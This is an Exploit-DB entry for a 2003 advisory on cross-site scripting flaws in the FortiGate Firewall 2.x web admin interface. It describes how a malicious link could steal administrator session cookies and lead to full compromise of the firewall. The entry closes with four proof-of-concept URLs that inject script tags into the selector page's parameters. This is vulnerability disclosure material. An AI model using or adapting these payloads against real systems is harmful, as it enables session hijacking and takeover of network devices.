FortiGate Firewall 2.x selector Admin Interface XSS

2003-11-12T00:00:00
ID EDB-ID:23379
Type exploitdb
Reporter Maarten Hartsuijker
Modified 2003-11-12T00:00:00

Description

FortiGate Firewall 2.x selector Admin Interface XSS. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/9033/info
  
Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface.
  
These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser. This could lead to theft of cookie-based authentication credentials, which contain the username and MD5 hash of the password, allowing for full compromise of the firewall.

http://www.example.com/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script>